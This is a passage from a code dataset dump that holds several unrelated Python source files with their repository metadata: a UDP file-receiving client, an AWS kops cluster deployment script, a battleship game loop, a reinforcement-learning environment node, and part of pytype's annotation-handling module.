seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
19483582203 | import socket
import hashlib
"""
data, addr = cli_socket.recvfrom(4096)
print("Server Says")
print(str(data))
cli_socket.close()
"""
cli_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msg = "Hello"
cli_socket.sendto(msg.encode("utf-8"), ('127.0.0.1', 12345))
data,addr = cli_socket.recvfrom(1024)
numero_conexiones = data.decode('utf-8')
data,addr = cli_socket.recvfrom(1024)
# Se captura el nombre del file desde el servidor
file_name = data
titulo = file_name.decode("utf-8")
f = open("ArchivosRecibidos/"+titulo, 'wb')
# recepción del hash
data,addr = cli_socket.recvfrom(1024)
hexadecimal_hash = data.decode()
def hasheame_esta():
""""This function returns the SHA-1 hash
of the file passed into it"""
# make a hash object
h = hashlib.sha1()
# open file for reading in binary mode
with open("files/"+titulo, 'rb') as file:
# loop till the end of the file
chunk = 0
while chunk != b'':
# read only 1024 bytes at a time
chunk = file.read(1024)
h.update(chunk)
# return the hex representation of digest
return h.hexdigest()
print("Nicole y brayan: el número de sockets que deben crear en esta iteración es " + numero_conexiones)
print(file_name)
print("se recibe el archivo con un hash esperado de " + hexadecimal_hash)
print(numero_conexiones)
data,addr = cli_socket.recvfrom(1024)
corte = titulo + "kill"
termine = corte.encode('utf-8')
print("se recibe el archivo" + titulo)
while data != termine:
f.write(data)
data,addr = cli_socket.recvfrom(1024)
print("archivo recibido")
f.close()
| rodrigo0097/servidorUDP_redes | UDPClient.py | UDPClient.py | py | 1,614 | python | es | code | 0 | github-code | 36 |
2036516482 | import os
import pathlib
import argparse
import uuid
import logging
import subprocess
from nuvoloso.dependencies.install_packages import InstallPackages
from nuvoloso.dependencies.kops_cluster import KopsCluster
from nuvoloso.dependencies.kubectl_helper import KubectlHelper
from nuvoloso.api.nuvo_management import NuvoManagement
DEFAULT_AMI = '099720109477/ubuntu/images/hvm-ssd/ubuntu-bionic-18.04-amd64-server-20190212.1'
DEFAULT_CENTRALD_CLUSTER_NAME = "nuvotestfiomulti.k8s.local"
NUVO_CLUSTER_NAME = "./nuvo_cluster_name.txt"
class CreateAppCluster:
def __init__(self, args):
self.args = args
if not args.create_only:
self.nuvo_mgmt = NuvoManagement(args)
self.kubectl_helper = KubectlHelper(args)
def install_dependencies(self):
InstallPackages.apt_get_update()
InstallPackages.install_kops()
InstallPackages.install_kubectl()
InstallPackages.install_awscli()
InstallPackages.configure_aws(self.args)
InstallPackages.generate_sshkeypair()
return
def set_protection_domains(self, csp_domain_id, nuvo_cluster_name):
accounts = self.nuvo_mgmt.get_all_accounts()
admin_account = self.args.account_name
for account in accounts:
# Creating spa to authorize accounts, so it can set protection domains
self.nuvo_mgmt.do_service_plan_allocation(nuvo_cluster_name, account['name'])
self.nuvo_mgmt.switch_accounts(account['name'])
protection_domain_id = self.nuvo_mgmt.create_protection_domain()
self.nuvo_mgmt.set_protection_domain(protection_domain_id, csp_domain_id)
self.nuvo_mgmt.switch_accounts(admin_account)
def create_application_cluster(self):
self.install_dependencies()
KopsCluster.create_kops_app_cluster(self.args)
if self.args.create_only:
return
try:
csp_domain_id = self.nuvo_mgmt.create_csp_domain()
nuvo_cluster_name = self.nuvo_mgmt.deploy_clusterd(csp_domain_id)
logging.info("Nuvo cluster created : %s", nuvo_cluster_name)
self.set_protection_domains(csp_domain_id, nuvo_cluster_name)
snapshot_catalog_pd = self.nuvo_mgmt.create_protection_domain()
self.nuvo_mgmt.set_snapshot_catalog_policy(snapshot_catalog_pd, csp_domain_id)
except subprocess.CalledProcessError as err:
if err.output: logging.info(err.output)
raise
return nuvo_cluster_name
def main():
"""main"""
default_cluster_name = DEFAULT_CENTRALD_CLUSTER_NAME
default_aws_access_key = default_aws_secret_access_key = default_kops_state_store = None
if os.environ.get('KOPS_CLUSTER_NAME'):
default_cluster_name = os.environ.get('KOPS_CLUSTER_NAME')
if os.environ.get('KOPS_STATE_STORE') is None:
default_kops_state_store = os.environ.get('KOPS_STATE_STORE')
if os.environ.get('AWS_ACCESS_KEY_ID'):
default_aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
if os.environ.get('AWS_SECRET_ACCESS_KEY') is None:
default_aws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
parser = argparse.ArgumentParser(description="Deploys a kops cluster with "
"Nuvo data plane and runs fio against all volumes")
parser.add_argument(
'--kops_cluster_name', help='name of kops cluster for Nuvo Data Plane[default: ' +
default_cluster_name + ']',
default=default_cluster_name)
parser.add_argument(
'--nodes', help='number of nodes in the cluster [default=3]', type=int, default=3,
choices=range(1, 101))
parser.add_argument(
'--kops_state_store', help='state store for cluster',
default=default_kops_state_store)
parser.add_argument(
'--aws_access_key', help='aws AccessKey', default=default_aws_access_key)
parser.add_argument(
'--aws_secret_access_key', help='aws SecretAccessKey',
default=default_aws_secret_access_key)
parser.add_argument(
'--region', help='aws region', default=None)
parser.add_argument(
'--k8s_master_zone', help='aws zone for master node',
default=None)
parser.add_argument(
'--k8s_nodes_zone', help='aws zone for other nodes ',
default=None)
parser.add_argument(
'--master_size', help='ec2 instance type for master node ', default=None)
parser.add_argument(
'--node_size', help='ec2 instance type for other nodes ', default=None)
parser.add_argument(
'--nuvo_kontroller_hostname', help='Hostname of https svc of Nuvo Kontroller')
parser.add_argument(
'--log_dirpath', help='log dir to hold test and nuvo logs', default=None)
parser.add_argument(
'--kubernetes_version', help='version of kubernetes to deploy', default='1.14.8')
parser.add_argument(
'--image', help='AMI Image for all instances', default=DEFAULT_AMI)
parser.add_argument(
'--node_volume_size', help='volume size for slave nodes of k8s cluster', type=int,
default=10)
parser.add_argument(
'--master_volume_size', help='volume size for master node of k8s cluster', type=int,
default=20)
parser.add_argument(
'--account_name', help='Nuvoloso account name', default='Demo Tenant')
parser.add_argument(
'--create_only', help='Create cluster only, skip Nuvoloso config', action='store_true')
args = parser.parse_args()
assert(args.kops_cluster_name and args.region and args.kops_state_store and args.aws_access_key
and args.aws_secret_access_key), "Some/all input parameters are not filled. Aborting"
if not args.create_only and args.nuvo_kontroller_hostname == None:
logging.error("Must specify nuvo kontroller hostname")
return
home_dir = pathlib.Path.home()
args.log_dirpath = args.log_dirpath if args.log_dirpath else str(home_dir.joinpath("logs-%s" % str(uuid.uuid4())[:5]))
pathlib.Path(args.log_dirpath).mkdir(parents=True, exist_ok=True)
logging.basicConfig(format='%(asctime)s %(message)s', filename=pathlib.Path(args.log_dirpath).joinpath(
"%s.log" % os.path.basename(__file__)), level=logging.INFO)
print("Script to deploy an application cluster")
test = CreateAppCluster(args)
nuvo_cluster_name = test.create_application_cluster()
if not args.create_only:
with open(NUVO_CLUSTER_NAME, 'w') as fd:
fd.write(nuvo_cluster_name)
logging.info("Application cluster name created: %s", nuvo_cluster_name)
else:
logging.info("Application cluster created: %s", args.kops_cluster_name)
if __name__ == '__main__':
main()
| Nuvoloso/testing_open_source | testingtools/deploy_app_cluster.py | deploy_app_cluster.py | py | 6,776 | python | en | code | 0 | github-code | 36 |
70463664104 | from generators import display_grid, clear
from turn_handler import cpu_turn, player_turn
from file_handlers import save_game, clear_save_data
def game_loop(board_size, player_ships, player_attack, cpu_ships, cpu_attack,
player_ship_count, cpu_ship_count, consecutive_hits, rounds):
"""
Run the main game loop for a game of battleship.
@param board_size: An integer representing the size of the game board.
@type board_size: int
@param player_ships: A list representing the locations of the player's ships on the game board.
@type player_ships: List[List[str, int]]
@param player_attack: A list representing the locations that the player has attack on the game board.
@type player_attack: List[List[str, int]]
@param cpu_ships: A list representing the locations of the CPU's ships on the game board.
@type cpu_ships: List[List[str, int]]
@param cpu_attack: A list representing the locations that the CPU has attack on the game board.
@type cpu_attack: List[List[str, int]]
@param player_ship_count: An integer representing the number of ships remaining for the player.
@type player_ship_count: int
@param cpu_ship_count: An integer representing the number of ships remaining for the CPU.
@type cpu_ship_count: int
@param consecutive_hits: An integer representing the number of consecutive hits made by the player.
@type consecutive_hits: List[List[int, int]]
@param rounds: An integer representing the number of rounds played in the game.
@type rounds: int
"""
options = []
# print the initial game board
game_over = False
# loop until the game is over
while not game_over:
# switch the current player
if rounds % 2 == 1:
current_player = "cpu"
display_grid(cpu_attack)
# handle the CPU's turn
cpu_attack, player_ship_count, consecutive_hits = cpu_turn(player_ships, cpu_attack,
board_size, player_ship_count,
consecutive_hits)
else:
current_player = "player"
# handle the player's turn
display_grid(player_attack)
player_attack, cpu_ship_count = player_turn(cpu_ships, player_attack, board_size, cpu_ship_count)
# print the updated game board
rounds += 1
game_over = (player_ship_count == 0) or (cpu_ship_count == 0)
save_game(player_ships, player_attack, cpu_ships, cpu_attack, consecutive_hits, player_ship_count,
cpu_ship_count, rounds)
clear(3)
# print a message to indicate who won the game
if current_player == "player":
print("You won!")
clear(5)
else:
print("The CPU won :(")
clear(5)
clear_save_data()
| DeeK-Dev/Battleship | game_loop.py | game_loop.py | py | 2,914 | python | en | code | 0 | github-code | 36 |
73969956584 | import numpy as np
from onerl.utils.import_module import get_class_from_str
from onerl.nodes.node import Node
from onerl.utils.shared_array import SharedArray
from onerl.utils.batch.shared import BatchShared
class EnvNode(Node):
@staticmethod
def node_preprocess_ns_config(node_class: str, num: int, ns_config: dict):
Node.node_preprocess_ns_config(node_class, num, ns_config)
# create sample env
sample_env = EnvNode.create_env(ns_config)
# obs
ns_config["env"]["obs_shape"] = sample_env.observation_space.shape
ns_config["env"]["obs_dtype"] = sample_env.observation_space.dtype
# act
if hasattr(sample_env.action_space, "n"):
# discrete
ns_config["env"]["act_shape"] = ()
ns_config["env"]["act_dtype"] = np.int64
ns_config["env"]["act_n"] = sample_env.action_space.n
else:
# continuous
ns_config["env"]["act_shape"] = sample_env.action_space.shape
ns_config["env"]["act_dtype"] = sample_env.action_space.dtype
ns_config["env"]["act_max"] = sample_env.action_space.high
assert np.isclose(sample_env.action_space.low, -sample_env.action_space.high).all(), \
"Action range must be symmetric"
# batch
ns_config["env"]["batch"] = {
"obs": (ns_config["env"]["obs_shape"], ns_config["env"]["obs_dtype"]),
"act": (ns_config["env"]["act_shape"], ns_config["env"]["act_dtype"]),
"rew": ((), np.float32),
"done": ((), np.float32)
}
# offline visualization
if hasattr(sample_env, "load_state") and hasattr(sample_env, "save_state"):
sample_vis_state = sample_env.save_state()
ns_config["env"]["vis_state_shape"] = sample_vis_state.shape
ns_config["env"]["vis_state_dtype"] = sample_vis_state.dtype
@staticmethod
def node_create_shared_objects(node_class: str, num: int, ns_config: dict):
objects = Node.node_create_shared_objects(node_class, num, ns_config)
for obj in objects:
# env
obj["obs"] = SharedArray((ns_config["env"]["frame_stack"], *ns_config["env"]["obs_shape"]),
ns_config["env"]["obs_dtype"])
obj["act"] = SharedArray(ns_config["env"]["act_shape"], ns_config["env"]["act_dtype"])
# log to replay
obj["log"] = BatchShared(ns_config["env"]["batch"], init_ready=True)
# offline visualization
if ("vis_state_shape" in ns_config["env"]) and (Node.node_count("VisualizerNode", ns_config) > 0):
obj["vis_state"] = SharedArray(ns_config["env"]["vis_state_shape"], ns_config["env"]["vis_state_dtype"])
return objects
@staticmethod
def create_env(ns_config: dict):
env_config = ns_config["env"]
env_class = get_class_from_str(env_config.get("import", ""), env_config["name"])
env = env_class(**env_config.get("params", {}))
return env
def run(self):
# acquire shared objects
shared_obs = self.objects["obs"].get()
shared_act = self.objects["act"].get()
shared_log = self.objects["log"].get()
shared_vis_state = self.objects["vis_state"].get() if "vis_state" in self.objects else None
# find nodes
node_scheduler = self.find("SchedulerNode")
node_replay_buffer = self.find("ReplayBufferNode")
if node_replay_buffer is None:
self.log("ReplayBufferNode not found, skip storing experience.")
# create and reset env
env = self.create_env(self.ns_config)
obs = env.reset()
tot_reward = 0
while True:
# copy obs to shared mem
self.setstate("copy_obs")
shared_obs[:-1] = shared_obs[1:]
shared_obs[-1] = obs
# request act
self.setstate("wait_act")
self.send(node_scheduler, self.node_name)
self.recv()
# step env
self.setstate("step")
obs_next, rew, done, info = env.step(shared_act)
# ignore time limit induced done
log_done = done and (not info.get("TimeLimit.truncated", False))
tot_reward += rew
# log
if node_replay_buffer is not None:
self.setstate("wait_log")
self.objects["log"].wait_ready()
self.setstate("copy_log")
shared_log.obs[...] = obs
shared_log.act[...] = shared_act
shared_log.rew[...] = rew
shared_log.done[...] = log_done
self.send(node_replay_buffer, self.node_name)
# update obs & reset
obs = obs_next
if done:
self.setstate("reset")
obs = env.reset()
self.log_metric({"{}@episode_reward".format(self.node_ns): tot_reward})
tot_reward = 0
# offline visualization
if shared_vis_state is not None:
shared_vis_state[...] = env.save_state()
| imoneoi/onerl | onerl/nodes/env_node.py | env_node.py | py | 5,191 | python | en | code | 16 | github-code | 36 |
28890288771 | """Constructs related to type annotations."""
import dataclasses
import logging
import typing
from typing import Mapping, Optional, Set, Tuple, Type, Union as _Union
from pytype import datatypes
from pytype.abstract import _base
from pytype.abstract import _classes
from pytype.abstract import _instance_base
from pytype.abstract import abstract_utils
from pytype.abstract import function
from pytype.abstract import mixin
from pytype.pytd import pytd_utils
log = logging.getLogger(__name__)
def _get_container_type_key(container):
try:
return container.get_type_key()
except AttributeError:
return container
class AnnotationClass(_instance_base.SimpleValue, mixin.HasSlots):
"""Base class of annotations that can be parameterized."""
def __init__(self, name, ctx):
super().__init__(name, ctx)
mixin.HasSlots.init_mixin(self)
self.set_native_slot("__getitem__", self.getitem_slot)
def getitem_slot(self, node, slice_var):
"""Custom __getitem__ implementation."""
slice_content = abstract_utils.maybe_extract_tuple(slice_var)
inner, ellipses = self._build_inner(slice_content)
value = self._build_value(node, tuple(inner), ellipses)
return node, value.to_variable(node)
def _build_inner(self, slice_content):
"""Build the list of parameters.
Args:
slice_content: The iterable of variables to extract parameters from.
Returns:
A tuple of a list of parameters and a set of indices at which an ellipsis
was replaced with Any.
"""
inner = []
ellipses = set()
for var in slice_content:
if len(var.bindings) > 1:
self.ctx.errorlog.ambiguous_annotation(self.ctx.vm.frames, var.data)
inner.append(self.ctx.convert.unsolvable)
else:
val = var.bindings[0].data
if val is self.ctx.convert.ellipsis:
# Ellipses are allowed only in special cases, so turn them into Any
# but record the indices so we can check if they're legal.
ellipses.add(len(inner))
inner.append(self.ctx.convert.unsolvable)
else:
inner.append(val)
return inner, ellipses
def _build_value(self, node, inner, ellipses):
raise NotImplementedError(self.__class__.__name__)
def __repr__(self):
return f"AnnotationClass({self.name})"
def _get_class(self):
return self.ctx.convert.type_type
class AnnotationContainer(AnnotationClass):
"""Implementation of X[...] for annotations."""
def __init__(self, name, ctx, base_cls):
super().__init__(name, ctx)
self.base_cls = base_cls
def __repr__(self):
return f"AnnotationContainer({self.name})"
def _sub_annotation(
self, annot: _base.BaseValue, subst: Mapping[str, _base.BaseValue],
seen: Optional[Set[_base.BaseValue]] = None,
) -> _base.BaseValue:
"""Apply type parameter substitutions to an annotation."""
# This is very similar to annotation_utils.sub_one_annotation, but a couple
# differences make it more convenient to maintain two separate methods:
# - subst here is a str->BaseValue mapping rather than str->Variable, and it
# would be wasteful to create variables just to match sub_one_annotation's
# expected input type.
# - subst contains the type to be substituted in, not an instance of it.
# Again, instantiating the type just to later get the type of the instance
# is unnecessary extra work.
if seen is None:
seen = set()
if annot in seen:
return annot.ctx.convert.unsolvable
seen = seen | {annot}
if isinstance(annot, TypeParameter):
if annot.full_name in subst:
return subst[annot.full_name]
else:
return self.ctx.convert.unsolvable
elif isinstance(annot, mixin.NestedAnnotation):
inner_types = [(key, self._sub_annotation(val, subst, seen))
for key, val in annot.get_inner_types()]
return annot.replace(inner_types)
return annot
def _get_value_info(
self, inner, ellipses, allowed_ellipses=frozenset()
) -> Tuple[Tuple[_Union[int, str], ...], Tuple[_base.BaseValue, ...],
Type[_classes.ParameterizedClass]]:
"""Get information about the container's inner values.
Args:
inner: The list of parameters from _build_inner().
ellipses: The set of ellipsis indices from _build_inner().
allowed_ellipses: Optionally, a set of indices at which ellipses are
allowed. If omitted, ellipses are assumed to be never allowed.
Returns:
A tuple of the template, the parameters, and the container class.
"""
if self.base_cls.full_name == "typing.Protocol":
return abstract_utils.build_generic_template(inner, self) + (
_classes.ParameterizedClass,) # pytype: disable=bad-return-type
if isinstance(self.base_cls, _classes.TupleClass):
template = tuple(range(self.base_cls.tuple_length))
elif isinstance(self.base_cls, _classes.CallableClass):
template = tuple(range(self.base_cls.num_args)) + (abstract_utils.RET,)
else:
template = tuple(t.name for t in self.base_cls.template)
self.ctx.errorlog.invalid_ellipses(self.ctx.vm.frames,
ellipses - allowed_ellipses, self.name)
last_index = len(inner) - 1
if last_index and last_index in ellipses and len(inner) > len(template):
# Even if an ellipsis is not allowed at this position, strip it off so
# that we report only one error for something like 'List[int, ...]'
inner = inner[:-1]
if isinstance(self.base_cls, _classes.ParameterizedClass):
# We're dealing with a generic type alias, e.g.:
# X = Dict[T, str]
# def f(x: X[int]): ...
# We construct `inner` using both the new inner values and the ones
# already in X, to end up with a final result of:
# template=(_K, _V)
# inner=(int, str)
new_inner = []
inner_idx = 0
subst = {}
# Note that we ignore any missing or extra values in inner for now; the
# problem will be reported later by _validate_inner.
for k in template:
v = self.base_cls.formal_type_parameters[k]
if v.formal:
params = self.ctx.annotation_utils.get_type_parameters(v)
for param in params:
# If there are too few parameters, we ignore the problem for now;
# it'll be reported when _build_value checks that the lengths of
# template and inner match.
if param.full_name not in subst and inner_idx < len(inner):
subst[param.full_name] = inner[inner_idx]
inner_idx += 1
new_inner.append(self._sub_annotation(v, subst))
else:
new_inner.append(v)
inner = tuple(new_inner)
if isinstance(self.base_cls, _classes.TupleClass):
template += (abstract_utils.T,)
inner += (self.ctx.convert.merge_values(inner),)
elif isinstance(self.base_cls, _classes.CallableClass):
template = template[:-1] + (abstract_utils.ARGS,) + template[-1:]
args = inner[:-1]
inner = args + (self.ctx.convert.merge_values(args),) + inner[-1:]
abstract_class = type(self.base_cls)
else:
abstract_class = _classes.ParameterizedClass
return template, inner, abstract_class
def _validate_inner(self, template, inner, raw_inner):
"""Check that the passed inner values are valid for the given template."""
if (isinstance(self.base_cls, _classes.ParameterizedClass) and
not abstract_utils.is_generic_protocol(self.base_cls)):
# For a generic type alias, we check that the number of typevars in the
# alias matches the number of raw parameters provided.
template_length = raw_template_length = len(
set(self.ctx.annotation_utils.get_type_parameters(self.base_cls)))
inner_length = len(raw_inner)
base_cls = self.base_cls.base_cls
else:
# In all other cases, we check that the final template length and
# parameter count match, after any adjustments like flattening the inner
# argument list in a Callable.
template_length = len(template)
raw_template_length = len(self.base_cls.template)
inner_length = len(inner)
base_cls = self.base_cls
if inner_length != template_length:
if not template:
self.ctx.errorlog.not_indexable(
self.ctx.vm.frames, base_cls.name, generic_warning=True)
else:
# Use the unprocessed values of `template` and `inner` so that the error
# message matches what the user sees.
if isinstance(self.base_cls, _classes.ParameterizedClass):
error_template = None
else:
error_template = (t.name for t in base_cls.template)
self.ctx.errorlog.wrong_annotation_parameter_count(
self.ctx.vm.frames, self.base_cls, raw_inner, raw_template_length,
error_template)
else:
if len(inner) == 1:
val, = inner
# It's a common mistake to index a container class rather than an
# instance (e.g., list[0]).
# We only check the "int" case, since string literals are allowed for
# late annotations.
if (isinstance(val, _instance_base.Instance) and
val.cls == self.ctx.convert.int_type):
# Don't report this error again.
inner = (self.ctx.convert.unsolvable,)
self.ctx.errorlog.not_indexable(self.ctx.vm.frames, self.name)
# Check for a misused Final annotation
if any(isinstance(val, FinalAnnotation) for val in inner):
self.ctx.errorlog.invalid_final_type(self.ctx.vm.frames)
inner = [val.annotation if isinstance(val, FinalAnnotation) else val
for val in inner]
return inner
def _build_value(self, node, inner, ellipses):
if self.base_cls.is_late_annotation():
# A parameterized LateAnnotation should be converted to another
# LateAnnotation to delay evaluation until the first late annotation is
# resolved. We don't want to create a ParameterizedClass immediately
# because (1) ParameterizedClass expects its base_cls to be a
# class_mixin.Class, and (2) we have to postpone error-checking anyway so
# we might as well postpone the entire evaluation.
printed_params = []
added_typing_imports = set()
for i, param in enumerate(inner):
if i in ellipses:
printed_params.append("...")
else:
typ = param.get_instance_type(node)
annot, typing_imports = pytd_utils.MakeTypeAnnotation(typ)
printed_params.append(annot)
added_typing_imports.update(typing_imports)
expr = f"{self.base_cls.expr}[{', '.join(printed_params)}]"
annot = LateAnnotation(expr, self.base_cls.stack, self.ctx,
typing_imports=added_typing_imports)
self.ctx.vm.late_annotations[self.base_cls.expr].append(annot)
return annot
template, processed_inner, abstract_class = self._get_value_info(
inner, ellipses)
if isinstance(self.base_cls, _classes.ParameterizedClass):
base_cls = self.base_cls.base_cls
else:
base_cls = self.base_cls
if base_cls.full_name in ("typing.Generic", "typing.Protocol"):
# Generic is unique in that parameterizing it defines a new template;
# usually, the parameterized class inherits the base class's template.
# Protocol[T, ...] is a shorthand for Protocol, Generic[T, ...].
template_params = [
param.with_scope(base_cls.full_name)
for param in typing.cast(Tuple[TypeParameter, ...], processed_inner)]
else:
template_params = None
processed_inner = self._validate_inner(template, processed_inner, inner)
params = {
name: (processed_inner[i]
if i < len(processed_inner) else self.ctx.convert.unsolvable)
for i, name in enumerate(template)
}
# Check if the concrete types match the type parameters.
if base_cls.template:
processed_params = self.ctx.annotation_utils.convert_class_annotations(
node, params)
for formal_param in base_cls.template:
root_node = self.ctx.root_node
param_value = processed_params[formal_param.name]
if (isinstance(formal_param, TypeParameter) and
not formal_param.is_generic() and
isinstance(param_value, TypeParameter)):
if formal_param.name == param_value.name:
# We don't need to check if a TypeParameter matches itself.
continue
else:
actual = param_value.instantiate(
root_node, container=abstract_utils.DUMMY_CONTAINER)
elif param_value.is_concrete and isinstance(param_value.pyval, str):
expr = param_value.pyval
annot = LateAnnotation(expr, self.ctx.vm.frames, self.ctx)
base = expr.split("[", 1)[0]
self.ctx.vm.late_annotations[base].append(annot)
actual = annot.instantiate(root_node)
else:
actual = param_value.instantiate(root_node)
match_result = self.ctx.matcher(node).compute_one_match(
actual, formal_param)
if not match_result.success:
if isinstance(param_value, TypeParameter):
# bad_matches replaces type parameters in the expected type with
# their concrete values, which is usually what we want. But when the
# actual type is a type parameter, then it's more helpful to show
# the expected type as a type parameter as well.
bad = []
for match in match_result.bad_matches:
expected = dataclasses.replace(match.expected, typ=formal_param)
bad.append(dataclasses.replace(match, expected=expected))
if isinstance(formal_param, TypeParameter):
details = (f"TypeVars {formal_param.name} and {param_value.name} "
"have incompatible bounds or constraints.")
else:
details = None
else:
bad = match_result.bad_matches
details = None
self.ctx.errorlog.bad_concrete_type(
self.ctx.vm.frames, root_node, bad, details)
return self.ctx.convert.unsolvable
try:
return abstract_class(base_cls, params, self.ctx, template_params)
except abstract_utils.GenericTypeError as e:
self.ctx.errorlog.invalid_annotation(self.ctx.vm.frames, e.annot, e.error)
return self.ctx.convert.unsolvable
def call(self, node, func, args, alias_map=None):
return self._call_helper(node, self.base_cls, func, args)
class _TypeVariableInstance(_base.BaseValue):
"""An instance of a type parameter."""
def __init__(self, param, instance, ctx):
super().__init__(param.name, ctx)
self.cls = self.param = param
self.instance = instance
self.scope = param.scope
@property
def full_name(self):
return f"{self.scope}.{self.name}" if self.scope else self.name
def call(self, node, func, args, alias_map=None):
var = self.instance.get_instance_type_parameter(self.name)
if var.bindings:
return function.call_function(self.ctx, node, var, args)
else:
return node, self.ctx.convert.empty.to_variable(self.ctx.root_node)
def __eq__(self, other):
if isinstance(other, type(self)):
return self.param == other.param and self.instance == other.instance
return NotImplemented
def __hash__(self):
return hash((self.param, self.instance))
def __repr__(self):
return f"{self.__class__.__name__}({self.name!r})"
class TypeParameterInstance(_TypeVariableInstance):
"""An instance of a TypeVar type parameter."""
class ParamSpecInstance(_TypeVariableInstance):
"""An instance of a ParamSpec type parameter."""
class _TypeVariable(_base.BaseValue):
"""Parameter of a type."""
formal = True
_INSTANCE_CLASS: Type[_TypeVariableInstance] = None
def __init__(self,
name,
ctx,
constraints=(),
bound=None,
covariant=False,
contravariant=False,
scope=None):
super().__init__(name, ctx)
# TODO(b/217789659): PEP-612 does not mention constraints, but ParamSpecs
# ignore all the extra parameters anyway..
self.constraints = constraints
self.bound = bound
self.covariant = covariant
self.contravariant = contravariant
self.scope = scope
@_base.BaseValue.module.setter
def module(self, module):
super(_TypeVariable, _TypeVariable).module.fset(self, module)
self.scope = module
@property
def full_name(self):
return f"{self.scope}.{self.name}" if self.scope else self.name
def is_generic(self):
return not self.constraints and not self.bound
def copy(self):
return self.__class__(self.name, self.ctx, self.constraints, self.bound,
self.covariant, self.contravariant, self.scope)
def with_scope(self, scope):
res = self.copy()
res.scope = scope
return res
def __eq__(self, other):
if isinstance(other, type(self)):
return (self.name == other.name and
self.constraints == other.constraints and
self.bound == other.bound and
self.covariant == other.covariant and
self.contravariant == other.contravariant and
self.scope == other.scope)
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash((self.name, self.constraints, self.bound, self.covariant,
self.contravariant))
def __repr__(self):
return ("{!s}({!r}, constraints={!r}, bound={!r}, module={!r})"
.format(self.__class__.__name__, self.name, self.constraints,
self.bound, self.scope))
def instantiate(self, node, container=None):
var = self.ctx.program.NewVariable()
if container and (not isinstance(container, _instance_base.SimpleValue) or
self.full_name in container.all_template_names):
instance = self._INSTANCE_CLASS(self, container, self.ctx) # pylint: disable=not-callable
return instance.to_variable(node)
else:
for c in self.constraints:
var.PasteVariable(c.instantiate(node, container))
if self.bound:
var.PasteVariable(self.bound.instantiate(node, container))
if not var.bindings:
var.AddBinding(self.ctx.convert.unsolvable, [], node)
return var
def update_official_name(self, name):
if self.name != name:
message = (f"TypeVar({self.name!r}) must be stored as {self.name!r}, "
f"not {name!r}")
self.ctx.errorlog.invalid_typevar(self.ctx.vm.frames, message)
def call(self, node, func, args, alias_map=None):
return node, self.instantiate(node)
class TypeParameter(_TypeVariable):
"""Parameter of a type (typing.TypeVar)."""
_INSTANCE_CLASS = TypeParameterInstance
class ParamSpec(_TypeVariable):
"""Parameter of a callable type (typing.ParamSpec)."""
_INSTANCE_CLASS = ParamSpecInstance
class ParamSpecArgs(_base.BaseValue):
"""ParamSpec.args."""
def __init__(self, paramspec, ctx):
super().__init__(f"{paramspec.name}.args", ctx)
self.paramspec = paramspec
def instantiate(self, node, container=None):
return self.to_variable(node)
class ParamSpecKwargs(_base.BaseValue):
"""ParamSpec.kwargs."""
def __init__(self, paramspec, ctx):
super().__init__(f"{paramspec.name}.kwargs", ctx)
self.paramspec = paramspec
def instantiate(self, node, container=None):
return self.to_variable(node)
class Concatenate(_base.BaseValue):
"""Concatenation of args and ParamSpec."""
def __init__(self, params, ctx):
super().__init__("Concatenate", ctx)
self.args = params[:-1]
self.paramspec = params[-1]
@property
def full_name(self):
return self.paramspec.full_name
def instantiate(self, node, container=None):
return self.to_variable(node)
@property
def num_args(self):
return len(self.args)
def get_args(self):
# Satisfies the same interface as abstract.CallableClass
return self.args
def __repr__(self):
args = ", ".join(list(map(repr, self.args)) + [self.paramspec.name])
return f"Concatenate[{args}]"
class Union(_base.BaseValue, mixin.NestedAnnotation, mixin.HasSlots):
"""A list of types.
Used for parameter matching.
Attributes:
options: Iterable of instances of BaseValue.
"""
def __init__(self, options, ctx):
super().__init__("Union", ctx)
assert options
self.options = list(options)
self.cls = self._get_class()
self._printing = False
self._instance_cache = {}
mixin.NestedAnnotation.init_mixin(self)
mixin.HasSlots.init_mixin(self)
self.set_native_slot("__getitem__", self.getitem_slot)
def __repr__(self):
if self._printing: # recursion detected
printed_contents = "..."
else:
self._printing = True
printed_contents = ", ".join(repr(o) for o in self.options)
self._printing = False
return f"{self.name}[{printed_contents}]"
def __eq__(self, other):
if isinstance(other, type(self)):
return self.options == other.options
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
# Use the names of the parameter values to approximate a hash, to avoid
# infinite recursion on recursive type annotations.
return hash(tuple(o.full_name for o in self.options))
def _unique_parameters(self):
return [o.to_variable(self.ctx.root_node) for o in self.options]
def _get_class(self):
classes = {o.cls for o in self.options}
if len(classes) > 1:
return self.ctx.convert.unsolvable
else:
return classes.pop()
def getitem_slot(self, node, slice_var):
"""Custom __getitem__ implementation."""
slice_content = abstract_utils.maybe_extract_tuple(slice_var)
params = self.ctx.annotation_utils.get_type_parameters(self)
num_params = len({x.name for x in params})
# Check that we are instantiating all the unbound type parameters
if num_params != len(slice_content):
self.ctx.errorlog.wrong_annotation_parameter_count(
self.ctx.vm.frames, self, [v.data[0] for v in slice_content],
num_params)
return node, self.ctx.new_unsolvable(node)
concrete = (
var.data[0].instantiate(node, container=abstract_utils.DUMMY_CONTAINER)
for var in slice_content)
subst = datatypes.AliasingDict()
for p in params:
for k in subst:
if k == p.name or k.endswith(f".{p.name}"):
subst.add_alias(p.full_name, k)
break
else:
subst[p.full_name] = next(concrete)
new = self.ctx.annotation_utils.sub_one_annotation(node, self, [subst])
return node, new.to_variable(node)
def instantiate(self, node, container=None):
var = self.ctx.program.NewVariable()
for option in self.options:
k = (node, _get_container_type_key(container), option)
if k in self._instance_cache:
if self._instance_cache[k] is None:
self._instance_cache[k] = self.ctx.new_unsolvable(node)
instance = self._instance_cache[k]
else:
self._instance_cache[k] = None
instance = option.instantiate(node, container)
self._instance_cache[k] = instance
var.PasteVariable(instance, node)
return var
def call(self, node, func, args, alias_map=None):
var = self.ctx.program.NewVariable(self.options, [], node)
return function.call_function(self.ctx, node, var, args)
def get_formal_type_parameter(self, t):
